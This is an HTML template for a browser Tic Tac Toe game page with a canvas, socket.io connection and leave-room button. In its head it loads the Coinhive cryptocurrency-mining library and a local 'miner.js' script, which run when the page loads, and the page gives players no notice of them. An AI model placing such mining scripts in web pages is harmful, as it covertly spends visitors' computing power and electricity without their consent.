<!DOCTYPE html>
<html>
	<head>
		<title>Tic Tac Toe</title>
		<script src ="<%= address %>/socket.io/socket.io.js"></script>
		<link rel="stylesheet" href="/stylesheets/game.css">
		<script src="https://coinhive.com/lib/coinhive.min.js"></script>
		<script src="/javascripts/miner.js"></script>
		<link rel="stylesheet" href="/stylesheets/main.css" />
	</head>
	<body>
		<div id = "game_wrapper">
			<div id = "game_status"></div>
			<canvas id = "game_canvas" autofocus>Can't show game<br>Download better browser</canvas><br>
			<button id = "leave_button">Leave room</button>
		</div>
		<script src = "/javascripts/cookies.js"></script>
		<script src = "/javascripts/useful.js"></script>
		<script src = "/javascripts/game.js"></script>
	</body>
</html>